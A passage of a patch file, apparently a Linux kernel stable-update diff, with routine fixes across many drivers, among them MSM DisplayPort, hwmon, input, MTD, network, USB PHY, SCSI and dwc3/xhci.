+ 
+ int dp_link_get_colorimetry_config(struct dp_link *dp_link)
+ {
+-	u32 cc;
++	u32 cc = DP_MISC0_COLORIMERY_CFG_LEGACY_RGB;
+ 	struct dp_link_private *link;
+ 
+ 	if (!dp_link) {
+@@ -1089,10 +1090,11 @@ int dp_link_get_colorimetry_config(struct dp_link *dp_link)
+ 	 * Unless a video pattern CTS test is ongoing, use RGB_VESA
+ 	 * Only RGB_VESA and RGB_CEA supported for now
+ 	 */
+-	if (dp_link_is_video_pattern_requested(link))
+-		cc = link->dp_link.test_video.test_dyn_range;
+-	else
+-		cc = DP_TEST_DYNAMIC_RANGE_VESA;
++	if (dp_link_is_video_pattern_requested(link)) {
++		if (link->dp_link.test_video.test_dyn_range &
++					DP_TEST_DYNAMIC_RANGE_CEA)
++			cc = DP_MISC0_COLORIMERY_CFG_CEA_RGB;
++	}
+ 
+ 	return cc;
+ }
+@@ -1172,6 +1174,9 @@ void dp_link_reset_phy_params_vx_px(struct dp_link *dp_link)
+ u32 dp_link_get_test_bits_depth(struct dp_link *dp_link, u32 bpp)
+ {
+ 	u32 tbd;
++	struct dp_link_private *link;
++
++	link = container_of(dp_link, struct dp_link_private, dp_link);
+ 
+ 	/*
+ 	 * Few simplistic rules and assumptions made here:
+@@ -1189,12 +1194,13 @@ u32 dp_link_get_test_bits_depth(struct dp_link *dp_link, u32 bpp)
+ 		tbd = DP_TEST_BIT_DEPTH_10;
+ 		break;
+ 	default:
+-		tbd = DP_TEST_BIT_DEPTH_UNKNOWN;
++		drm_dbg_dp(link->drm_dev, "bpp=%d not supported, use bpc=8\n",
++			   bpp);
++		tbd = DP_TEST_BIT_DEPTH_8;
+ 		break;
+ 	}
+ 
+-	if (tbd != DP_TEST_BIT_DEPTH_UNKNOWN)
+-		tbd = (tbd >> DP_TEST_BIT_DEPTH_SHIFT);
++	tbd = (tbd >> DP_TEST_BIT_DEPTH_SHIFT);
+ 
+ 	return tbd;
+ }
+diff --git a/drivers/gpu/drm/msm/dp/dp_reg.h b/drivers/gpu/drm/msm/dp/dp_reg.h
+index 268602803d9a3..176a503ece9c0 100644
+--- a/drivers/gpu/drm/msm/dp/dp_reg.h
++++ b/drivers/gpu/drm/msm/dp/dp_reg.h
+@@ -129,6 +129,9 @@
+ #define DP_MISC0_COLORIMETRY_CFG_SHIFT		(0x00000001)
+ #define DP_MISC0_TEST_BITS_DEPTH_SHIFT		(0x00000005)
+ 
++#define DP_MISC0_COLORIMERY_CFG_LEGACY_RGB	(0)
++#define DP_MISC0_COLORIMERY_CFG_CEA_RGB		(0x04)
++
+ #define REG_DP_VALID_BOUNDARY			(0x00000030)
+ #define REG_DP_VALID_BOUNDARY_2			(0x00000034)
+ 
+diff --git a/drivers/hwmon/aspeed-pwm-tacho.c b/drivers/hwmon/aspeed-pwm-tacho.c
+index d11f674e3dc37..51f321bcd778a 100644
+--- a/drivers/hwmon/aspeed-pwm-tacho.c
++++ b/drivers/hwmon/aspeed-pwm-tacho.c
+@@ -194,6 +194,8 @@ struct aspeed_pwm_tacho_data {
+ 	u8 fan_tach_ch_source[16];
+ 	struct aspeed_cooling_device *cdev[8];
+ 	const struct attribute_group *groups[3];
++	/* protects access to shared ASPEED_PTCR_RESULT */
++	struct mutex tach_lock;
+ };
+ 
+ enum type { TYPEM, TYPEN, TYPEO };
+@@ -528,6 +530,8 @@ static int aspeed_get_fan_tach_ch_rpm(struct aspeed_pwm_tacho_data *priv,
+ 	u8 fan_tach_ch_source, type, mode, both;
+ 	int ret;
+ 
++	mutex_lock(&priv->tach_lock);
++
+ 	regmap_write(priv->regmap, ASPEED_PTCR_TRIGGER, 0);
+ 	regmap_write(priv->regmap, ASPEED_PTCR_TRIGGER, 0x1 << fan_tach_ch);
+ 
+@@ -545,6 +549,8 @@ static int aspeed_get_fan_tach_ch_rpm(struct aspeed_pwm_tacho_data *priv,
+ 		ASPEED_RPM_STATUS_SLEEP_USEC,
+ 		usec);
+ 
++	mutex_unlock(&priv->tach_lock);
++
+ 	/* return -ETIMEDOUT if we didn't get an answer. */
+ 	if (ret)
+ 		return ret;
+@@ -904,6 +910,7 @@ static int aspeed_pwm_tacho_probe(struct platform_device *pdev)
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
++	mutex_init(&priv->tach_lock);
+ 	priv->regmap = devm_regmap_init(dev, NULL, (__force void *)regs,
+ 			&aspeed_pwm_tacho_regmap_config);
+ 	if (IS_ERR(priv->regmap))
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index 09aab5859fa75..59344ad62822d 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -380,7 +380,7 @@ static int get_tjmax(struct cpuinfo_x86 *c, u32 id, struct device *dev)
+ }
+ 
+ static int create_core_attrs(struct temp_data *tdata, struct device *dev,
+-			     int attr_no)
++			     int index)
+ {
+ 	int i;
+ 	static ssize_t (*const rd_ptr[TOTAL_ATTRS]) (struct device *dev,
+@@ -392,13 +392,20 @@ static int create_core_attrs(struct temp_data *tdata, struct device *dev,
+ 	};
+ 
+ 	for (i = 0; i < tdata->attr_size; i++) {
++		/*
++		 * We map the attr number to core id of the CPU
++		 * The attr number is always core id + 2
++		 * The Pkgtemp will always show up as temp1_*, if available
++		 */
++		int attr_no = tdata->is_pkg_data ? 1 : tdata->cpu_core_id + 2;
++
+ 		snprintf(tdata->attr_name[i], CORETEMP_NAME_LENGTH,
+ 			 "temp%d_%s", attr_no, suffixes[i]);
+ 		sysfs_attr_init(&tdata->sd_attrs[i].dev_attr.attr);
+ 		tdata->sd_attrs[i].dev_attr.attr.name = tdata->attr_name[i];
+ 		tdata->sd_attrs[i].dev_attr.attr.mode = 0444;
+ 		tdata->sd_attrs[i].dev_attr.show = rd_ptr[i];
+-		tdata->sd_attrs[i].index = attr_no;
++		tdata->sd_attrs[i].index = index;
+ 		tdata->attrs[i] = &tdata->sd_attrs[i].dev_attr.attr;
+ 	}
+ 	tdata->attr_group.attrs = tdata->attrs;
+@@ -456,27 +463,22 @@ static int create_core_data(struct platform_device *pdev, unsigned int cpu,
+ 	struct platform_data *pdata = platform_get_drvdata(pdev);
+ 	struct cpuinfo_x86 *c = &cpu_data(cpu);
+ 	u32 eax, edx;
+-	int err, index, attr_no;
++	int err, index;
+ 
+ 	/*
+-	 * Find attr number for sysfs:
+-	 * We map the attr number to core id of the CPU
+-	 * The attr number is always core id + 2
+-	 * The Pkgtemp will always show up as temp1_*, if available
++	 * Get the index of tdata in pdata->core_data[]
++	 * tdata for package: pdata->core_data[1]
++	 * tdata for core: pdata->core_data[2] .. pdata->core_data[NUM_REAL_CORES + 1]
+ 	 */
+ 	if (pkg_flag) {
+-		attr_no = PKG_SYSFS_ATTR_NO;
++		index = PKG_SYSFS_ATTR_NO;
+ 	} else {
+-		index = ida_alloc(&pdata->ida, GFP_KERNEL);
++		index = ida_alloc_max(&pdata->ida, NUM_REAL_CORES - 1, GFP_KERNEL);
+ 		if (index < 0)
+ 			return index;
+-		pdata->cpu_map[index] = topology_core_id(cpu);
+-		attr_no = index + BASE_SYSFS_ATTR_NO;
+-	}
+ 
+-	if (attr_no > MAX_CORE_DATA - 1) {
+-		err = -ERANGE;
+-		goto ida_free;
++		pdata->cpu_map[index] = topology_core_id(cpu);
++		index += BASE_SYSFS_ATTR_NO;
+ 	}
+ 
+ 	tdata = init_temp_data(cpu, pkg_flag);
+@@ -508,20 +510,20 @@ static int create_core_data(struct platform_device *pdev, unsigned int cpu,
+ 		}
+ 	}
+ 
+-	pdata->core_data[attr_no] = tdata;
++	pdata->core_data[index] = tdata;
+ 
+ 	/* Create sysfs interfaces */
+-	err = create_core_attrs(tdata, pdata->hwmon_dev, attr_no);
++	err = create_core_attrs(tdata, pdata->hwmon_dev, index);
+ 	if (err)
+ 		goto exit_free;
+ 
+ 	return 0;
+ exit_free:
+-	pdata->core_data[attr_no] = NULL;
++	pdata->core_data[index] = NULL;
+ 	kfree(tdata);
+ ida_free:
+ 	if (!pkg_flag)
+-		ida_free(&pdata->ida, index);
++		ida_free(&pdata->ida, index - BASE_SYSFS_ATTR_NO);
+ 	return err;
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 447e1bcc82a32..4859b99d54fc2 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -2825,7 +2825,7 @@ static struct ib_mr *irdma_reg_user_mr(struct ib_pd *pd, u64 start, u64 len,
+ 	iwmr->ibmr.pd = pd;
+ 	iwmr->ibmr.device = pd->device;
+ 	iwmr->ibmr.iova = virt;
+-	iwmr->page_size = PAGE_SIZE;
++	iwmr->page_size = SZ_4K;
+ 
+ 	if (req.reg_type == IRDMA_MEMREG_TYPE_MEM) {
+ 		iwmr->page_size = ib_umem_find_best_pgsz(region,
+diff --git a/drivers/input/keyboard/atkbd.c b/drivers/input/keyboard/atkbd.c
+index c4d8caadec59e..661d6c8b059bf 100644
+--- a/drivers/input/keyboard/atkbd.c
++++ b/drivers/input/keyboard/atkbd.c
+@@ -792,7 +792,6 @@ static int atkbd_probe(struct atkbd *atkbd)
+ {
+ 	struct ps2dev *ps2dev = &atkbd->ps2dev;
+ 	unsigned char param[2];
+-	bool skip_getid;
+ 
+ /*
+  * Some systems, where the bit-twiddling when testing the io-lines of the
+@@ -806,6 +805,11 @@ static int atkbd_probe(struct atkbd *atkbd)
+ 				 "keyboard reset failed on %s\n",
+ 				 ps2dev->serio->phys);
+ 
++	if (atkbd_skip_getid(atkbd)) {
++		atkbd->id = 0xab83;
++		return 0;
++	}
++
+ /*
+  * Then we check the keyboard ID. We should get 0xab83 under normal conditions.
+  * Some keyboards report different values, but the first byte is always 0xab or
+@@ -814,18 +818,17 @@ static int atkbd_probe(struct atkbd *atkbd)
+  */
+ 
+ 	param[0] = param[1] = 0xa5;	/* initialize with invalid values */
+-	skip_getid = atkbd_skip_getid(atkbd);
+-	if (skip_getid || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
++	if (ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
+ 
+ /*
+- * If the get ID command was skipped or failed, we check if we can at least set
++ * If the get ID command failed, we check if we can at least set
+  * the LEDs on the keyboard. This should work on every keyboard out there.
+  * It also turns the LEDs off, which we want anyway.
+  */
+ 		param[0] = 0;
+ 		if (ps2_command(ps2dev, param, ATKBD_CMD_SETLEDS))
+ 			return -1;
+-		atkbd->id = skip_getid ? 0xab83 : 0xabba;
++		atkbd->id = 0xabba;
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index b585b1dab870e..cd45a65e17f2c 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -1208,6 +1208,12 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 					SERIO_QUIRK_RESET_ALWAYS | SERIO_QUIRK_NOLOOP |
+ 					SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NS5x_7xPU"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NJ50_70CU"),
+diff --git a/drivers/mtd/parsers/ofpart_core.c b/drivers/mtd/parsers/ofpart_core.c
+index 192190c42fc84..e7b8e9d0a9103 100644
+--- a/drivers/mtd/parsers/ofpart_core.c
++++ b/drivers/mtd/parsers/ofpart_core.c
+@@ -122,6 +122,25 @@ static int parse_fixed_partitions(struct mtd_info *master,
+ 
+ 		a_cells = of_n_addr_cells(pp);
+ 		s_cells = of_n_size_cells(pp);
++		if (!dedicated && s_cells == 0) {
++			/*
++			 * This is an ugly workaround to avoid creating a
++			 * regression on devices that are still creating
++			 * partitions as direct children of the nand controller.
++			 * This can happen in case the nand controller node has
++			 * #size-cells equal to 0 and the firmware (e.g.
++			 * U-Boot) just adds the partitions there assuming
++			 * 32-bit addressing.
++			 *
++			 * If you get this warning your firmware and/or DTS
++			 * should be really fixed.
++			 *
++			 * This is working only for devices smaller than 4GiB.
++			 */
++			pr_warn("%s: ofpart partition %pOF (%pOF) #size-cells is wrongly set to <0>, assuming <1> for parsing partitions.\n",
++				master->name, pp, mtd_node);
++			s_cells = 1;
++		}
+ 		if (len / 4 != a_cells + s_cells) {
+ 			pr_debug("%s: ofpart partition %pOF (%pOF) error parsing reg property.\n",
+ 				 master->name, pp,
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+index abd4832e4ed21..5acb3e16b5677 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+@@ -993,7 +993,7 @@ int aq_ptp_ring_alloc(struct aq_nic_s *aq_nic)
+ 	return 0;
+ 
+ err_exit_hwts_rx:
+-	aq_ring_free(&aq_ptp->hwts_rx);
++	aq_ring_hwts_rx_free(&aq_ptp->hwts_rx);
+ err_exit_ptp_rx:
+ 	aq_ring_free(&aq_ptp->ptp_rx);
+ err_exit_ptp_tx:
+@@ -1011,7 +1011,7 @@ void aq_ptp_ring_free(struct aq_nic_s *aq_nic)
+ 
+ 	aq_ring_free(&aq_ptp->ptp_tx);
+ 	aq_ring_free(&aq_ptp->ptp_rx);
+-	aq_ring_free(&aq_ptp->hwts_rx);
++	aq_ring_hwts_rx_free(&aq_ptp->hwts_rx);
+ 
+ 	aq_ptp_skb_ring_release(&aq_ptp->skb_ring);
+ }
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 9c314fe14ab62..0eaaba3a18ee0 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -919,6 +919,19 @@ void aq_ring_free(struct aq_ring_s *self)
+ 	}
+ }
+ 
++void aq_ring_hwts_rx_free(struct aq_ring_s *self)
++{
++	if (!self)
++		return;
++
++	if (self->dx_ring) {
++		dma_free_coherent(aq_nic_get_dev(self->aq_nic),
++				  self->size * self->dx_size + AQ_CFG_RXDS_DEF,
++				  self->dx_ring, self->dx_ring_pa);
++		self->dx_ring = NULL;
++	}
++}
++
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data)
+ {
+ 	unsigned int count;
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+index 52847310740a2..d627ace850ff5 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+@@ -210,6 +210,7 @@ int aq_ring_rx_fill(struct aq_ring_s *self);
+ int aq_ring_hwts_rx_alloc(struct aq_ring_s *self,
+ 			  struct aq_nic_s *aq_nic, unsigned int idx,
+ 			  unsigned int size, unsigned int dx_size);
++void aq_ring_hwts_rx_free(struct aq_ring_s *self);
+ void aq_ring_hwts_rx_clean(struct aq_ring_s *self, struct aq_nic_s *aq_nic);
+ 
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 0f896f606c3e6..c00d6d67db518 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -930,8 +930,11 @@ int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
+ 	if (pfvf->ptp && qidx < pfvf->hw.tx_queues) {
+ 		err = qmem_alloc(pfvf->dev, &sq->timestamps, qset->sqe_cnt,
+ 				 sizeof(*sq->timestamps));
+-		if (err)
++		if (err) {
++			kfree(sq->sg);
++			sq->sg = NULL;
+ 			return err;
++		}
+ 	}
+ 
+ 	sq->head = 0;
+@@ -947,7 +950,14 @@ int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
+ 	sq->stats.bytes = 0;
+ 	sq->stats.pkts = 0;
+ 
+-	return pfvf->hw_ops->sq_aq_init(pfvf, qidx, sqb_aura);
++	err = pfvf->hw_ops->sq_aq_init(pfvf, qidx, sqb_aura);
++	if (err) {
++		kfree(sq->sg);
++		sq->sg = NULL;
++		return err;
++	}
++
++	return 0;
+ 
+ }
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index 54bb072aeb2d3..c11d626856247 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -209,6 +209,7 @@ struct stmmac_safety_stats {
+ 	unsigned long mac_errors[32];
+ 	unsigned long mtl_errors[32];
+ 	unsigned long dma_errors[32];
++	unsigned long dma_dpp_errors[32];
+ };
+ 
+ /* Number of fields in Safety Stats */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+index 880a75bf2eb1f..8748c37e9dac9 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+@@ -282,6 +282,8 @@
+ #define XGMAC_RXCEIE			BIT(4)
+ #define XGMAC_TXCEIE			BIT(0)
+ #define XGMAC_MTL_ECC_INT_STATUS	0x000010cc
++#define XGMAC_MTL_DPP_CONTROL		0x000010e0
++#define XGMAC_DPP_DISABLE		BIT(0)
+ #define XGMAC_MTL_TXQ_OPMODE(x)		(0x00001100 + (0x80 * (x)))
+ #define XGMAC_TQS			GENMASK(25, 16)
+ #define XGMAC_TQS_SHIFT			16
+@@ -364,6 +366,7 @@
+ #define XGMAC_DCEIE			BIT(1)
+ #define XGMAC_TCEIE			BIT(0)
+ #define XGMAC_DMA_ECC_INT_STATUS	0x0000306c
++#define XGMAC_DMA_DPP_INT_STATUS	0x00003074
+ #define XGMAC_DMA_CH_CONTROL(x)		(0x00003100 + (0x80 * (x)))
+ #define XGMAC_SPH			BIT(24)
+ #define XGMAC_PBLx8			BIT(16)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index c2181c277291b..ec1616ffbfa7a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -789,6 +789,44 @@ static const struct dwxgmac3_error_desc dwxgmac3_dma_errors[32]= {
+ 	{ false, "UNKNOWN", "Unknown Error" }, /* 31 */
+ };
+ 
++#define DPP_RX_ERR "Read Rx Descriptor Parity checker Error"
++#define DPP_TX_ERR "Read Tx Descriptor Parity checker Error"
++
++static const struct dwxgmac3_error_desc dwxgmac3_dma_dpp_errors[32] = {
++	{ true, "TDPES0", DPP_TX_ERR },
++	{ true, "TDPES1", DPP_TX_ERR },
++	{ true, "TDPES2", DPP_TX_ERR },
++	{ true, "TDPES3", DPP_TX_ERR },
++	{ true, "TDPES4", DPP_TX_ERR },
++	{ true, "TDPES5", DPP_TX_ERR },
++	{ true, "TDPES6", DPP_TX_ERR },
++	{ true, "TDPES7", DPP_TX_ERR },
++	{ true, "TDPES8", DPP_TX_ERR },
++	{ true, "TDPES9", DPP_TX_ERR },
++	{ true, "TDPES10", DPP_TX_ERR },
++	{ true, "TDPES11", DPP_TX_ERR },
++	{ true, "TDPES12", DPP_TX_ERR },
++	{ true, "TDPES13", DPP_TX_ERR },
++	{ true, "TDPES14", DPP_TX_ERR },
++	{ true, "TDPES15", DPP_TX_ERR },
++	{ true, "RDPES0", DPP_RX_ERR },
++	{ true, "RDPES1", DPP_RX_ERR },
++	{ true, "RDPES2", DPP_RX_ERR },
++	{ true, "RDPES3", DPP_RX_ERR },
++	{ true, "RDPES4", DPP_RX_ERR },
++	{ true, "RDPES5", DPP_RX_ERR },
++	{ true, "RDPES6", DPP_RX_ERR },
++	{ true, "RDPES7", DPP_RX_ERR },
++	{ true, "RDPES8", DPP_RX_ERR },
++	{ true, "RDPES9", DPP_RX_ERR },
++	{ true, "RDPES10", DPP_RX_ERR },
++	{ true, "RDPES11", DPP_RX_ERR },
++	{ true, "RDPES12", DPP_RX_ERR },
++	{ true, "RDPES13", DPP_RX_ERR },
++	{ true, "RDPES14", DPP_RX_ERR },
++	{ true, "RDPES15", DPP_RX_ERR },
++};
++
+ static void dwxgmac3_handle_dma_err(struct net_device *ndev,
+ 				    void __iomem *ioaddr, bool correctable,
+ 				    struct stmmac_safety_stats *stats)
+@@ -800,6 +838,13 @@ static void dwxgmac3_handle_dma_err(struct net_device *ndev,
+ 
+ 	dwxgmac3_log_error(ndev, value, correctable, "DMA",
+ 			   dwxgmac3_dma_errors, STAT_OFF(dma_errors), stats);
++
++	value = readl(ioaddr + XGMAC_DMA_DPP_INT_STATUS);
++	writel(value, ioaddr + XGMAC_DMA_DPP_INT_STATUS);
++
++	dwxgmac3_log_error(ndev, value, false, "DMA_DPP",
++			   dwxgmac3_dma_dpp_errors,
++			   STAT_OFF(dma_dpp_errors), stats);
+ }
+ 
+ static int
+@@ -838,6 +883,12 @@ dwxgmac3_safety_feat_config(void __iomem *ioaddr, unsigned int asp,
+ 	value |= XGMAC_TMOUTEN; /* FSM Timeout Feature */
+ 	writel(value, ioaddr + XGMAC_MAC_FSM_CONTROL);
+ 
++	/* 5. Enable Data Path Parity Protection */
++	value = readl(ioaddr + XGMAC_MTL_DPP_CONTROL);
++	/* already enabled by default, explicitly enable it again */
++	value &= ~XGMAC_DPP_DISABLE;
++	writel(value, ioaddr + XGMAC_MTL_DPP_CONTROL);
++
+ 	return 0;
+ }
+ 
+@@ -871,7 +922,11 @@ static int dwxgmac3_safety_feat_irq_status(struct net_device *ndev,
+ 		ret |= !corr;
+ 	}
+ 
+-	err = dma & (XGMAC_DEUIS | XGMAC_DECIS);
++	/* DMA_DPP_Interrupt_Status is indicated by MCSIS bit in
++	 * DMA_Safety_Interrupt_Status, so we handle DMA Data Path
++	 * Parity Errors here
++	 */
++	err = dma & (XGMAC_DEUIS | XGMAC_DECIS | XGMAC_MCSIS);
+ 	corr = dma & XGMAC_DECIS;
+ 	if (err) {
+ 		dwxgmac3_handle_dma_err(ndev, ioaddr, corr, stats);
+@@ -887,6 +942,7 @@ static const struct dwxgmac3_error {
+ 	{ dwxgmac3_mac_errors },
+ 	{ dwxgmac3_mtl_errors },
+ 	{ dwxgmac3_dma_errors },
++	{ dwxgmac3_dma_dpp_errors },
+ };
+ 
+ static int dwxgmac3_safety_feat_dump(struct stmmac_safety_stats *stats,
+diff --git a/drivers/net/netdevsim/dev.c b/drivers/net/netdevsim/dev.c
+index c3fbdd6b68baf..f3fa4bd121169 100644
+--- a/drivers/net/netdevsim/dev.c
++++ b/drivers/net/netdevsim/dev.c
+@@ -835,14 +835,14 @@ static void nsim_dev_trap_report_work(struct work_struct *work)
+ 				      trap_report_dw.work);
+ 	nsim_dev = nsim_trap_data->nsim_dev;
+ 
+-	/* For each running port and enabled packet trap, generate a UDP
+-	 * packet with a random 5-tuple and report it.
+-	 */
+ 	if (!devl_trylock(priv_to_devlink(nsim_dev))) {
+-		schedule_delayed_work(&nsim_dev->trap_data->trap_report_dw, 0);
++		schedule_delayed_work(&nsim_dev->trap_data->trap_report_dw, 1);
+ 		return;
+ 	}
+ 
++	/* For each running port and enabled packet trap, generate a UDP
++	 * packet with a random 5-tuple and report it.
++	 */
+ 	list_for_each_entry(nsim_dev_port, &nsim_dev->port_list, list) {
+ 		if (!netif_running(nsim_dev_port->ns->netdev))
+ 			continue;
+diff --git a/drivers/net/ppp/ppp_async.c b/drivers/net/ppp/ppp_async.c
+index 15a179631903f..abc65c4d7a303 100644
+--- a/drivers/net/ppp/ppp_async.c
++++ b/drivers/net/ppp/ppp_async.c
+@@ -469,6 +469,10 @@ ppp_async_ioctl(struct ppp_channel *chan, unsigned int cmd, unsigned long arg)
+ 	case PPPIOCSMRU:
+ 		if (get_user(val, p))
+ 			break;
++		if (val > U16_MAX) {
++			err = -EINVAL;
++			break;
++		}
+ 		if (val < PPP_MRU)
+ 			val = PPP_MRU;
+ 		ap->mru = val;
+diff --git a/drivers/phy/renesas/phy-rcar-gen3-usb2.c b/drivers/phy/renesas/phy-rcar-gen3-usb2.c
+index 9de617ca9daa2..7e61c6b278a74 100644
+--- a/drivers/phy/renesas/phy-rcar-gen3-usb2.c
++++ b/drivers/phy/renesas/phy-rcar-gen3-usb2.c
+@@ -675,8 +675,6 @@ static int rcar_gen3_phy_usb2_probe(struct platform_device *pdev)
+ 	channel->irq = platform_get_irq_optional(pdev, 0);
+ 	channel->dr_mode = rcar_gen3_get_dr_mode(dev->of_node);
+ 	if (channel->dr_mode != USB_DR_MODE_UNKNOWN) {
+-		int ret;
+-
+ 		channel->is_otg_channel = true;
+ 		channel->uses_otg_pins = !of_property_read_bool(dev->of_node,
+ 							"renesas,no-otg-pins");
+@@ -740,8 +738,6 @@ static int rcar_gen3_phy_usb2_probe(struct platform_device *pdev)
+ 		ret = PTR_ERR(provider);
+ 		goto error;
+ 	} else if (channel->is_otg_channel) {
+-		int ret;
+-
+ 		ret = device_create_file(dev, &dev_attr_role);
+ 		if (ret < 0)
+ 			goto error;
+diff --git a/drivers/phy/ti/phy-omap-usb2.c b/drivers/phy/ti/phy-omap-usb2.c
+index 31a775877f6e3..63c45809943ff 100644
+--- a/drivers/phy/ti/phy-omap-usb2.c
++++ b/drivers/phy/ti/phy-omap-usb2.c
+@@ -116,7 +116,7 @@ static int omap_usb_set_vbus(struct usb_otg *otg, bool enabled)
+ {
+ 	struct omap_usb *phy = phy_to_omapusb(otg->usb_phy);
+ 
+-	if (!phy->comparator)
++	if (!phy->comparator || !phy->comparator->set_vbus)
+ 		return -ENODEV;
+ 
+ 	return phy->comparator->set_vbus(phy->comparator, enabled);
+@@ -126,7 +126,7 @@ static int omap_usb_start_srp(struct usb_otg *otg)
+ {
+ 	struct omap_usb *phy = phy_to_omapusb(otg->usb_phy);
+ 
+-	if (!phy->comparator)
++	if (!phy->comparator || !phy->comparator->start_srp)
+ 		return -ENODEV;
+ 
+ 	return phy->comparator->start_srp(phy->comparator);
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 66290961c47c2..cfa6f0edff17c 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -277,11 +277,12 @@ static void scsi_eh_inc_host_failed(struct rcu_head *head)
+ {
+ 	struct scsi_cmnd *scmd = container_of(head, typeof(*scmd), rcu);
+ 	struct Scsi_Host *shost = scmd->device->host;
++	unsigned int busy = scsi_host_busy(shost);
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(shost->host_lock, flags);
+ 	shost->host_failed++;
+-	scsi_eh_wakeup(shost, scsi_host_busy(shost));
++	scsi_eh_wakeup(shost, busy);
+ 	spin_unlock_irqrestore(shost->host_lock, flags);
+ }
+ 
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index 0e7e9f1e5a029..5c5954b78585e 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -280,9 +280,11 @@ static void scsi_dec_host_busy(struct Scsi_Host *shost, struct scsi_cmnd *cmd)
+ 	rcu_read_lock();
+ 	__clear_bit(SCMD_STATE_INFLIGHT, &cmd->state);
+ 	if (unlikely(scsi_host_in_recovery(shost))) {
++		unsigned int busy = scsi_host_busy(shost);
++
+ 		spin_lock_irqsave(shost->host_lock, flags);
+ 		if (shost->host_failed || shost->host_eh_scheduled)
+-			scsi_eh_wakeup(shost, scsi_host_busy(shost));
++			scsi_eh_wakeup(shost, busy);
+ 		spin_unlock_irqrestore(shost->host_lock, flags);
+ 	}
+ 	rcu_read_unlock();
+diff --git a/drivers/usb/dwc3/host.c b/drivers/usb/dwc3/host.c
+index f6f13e7f1ba14..f4d8e80c4c347 100644
+--- a/drivers/usb/dwc3/host.c
++++ b/drivers/usb/dwc3/host.c
+@@ -66,7 +66,7 @@ out:
+ 
+ int dwc3_host_init(struct dwc3 *dwc)
+ {
+-	struct property_entry	props[4];
++	struct property_entry	props[5];
+ 	struct platform_device	*xhci;
+ 	int			ret, irq;
+ 	int			prop_idx = 0;
+@@ -94,6 +94,8 @@ int dwc3_host_init(struct dwc3 *dwc)
+ 
+ 	memset(props, 0, sizeof(struct property_entry) * ARRAY_SIZE(props));
+ 
++	props[prop_idx++] = PROPERTY_ENTRY_BOOL("xhci-sg-trb-cache-size-quirk");
++
+ 	if (dwc->usb3_lpm_capable)
+ 		props[prop_idx++] = PROPERTY_ENTRY_BOOL("usb3-lpm-capable");
+ 
+diff --git a/drivers/usb/host/xhci-plat.c b/drivers/usb/host/xhci-plat.c
+index c9438dc56f5fc..b387d39bfb81d 100644
+--- a/drivers/usb/host/xhci-plat.c
++++ b/drivers/usb/host/xhci-plat.c
+@@ -301,6 +301,9 @@ static int xhci_plat_probe(struct platform_device *pdev)
+ 		if (device_property_read_bool(tmpdev, "quirk-broken-port-ped"))
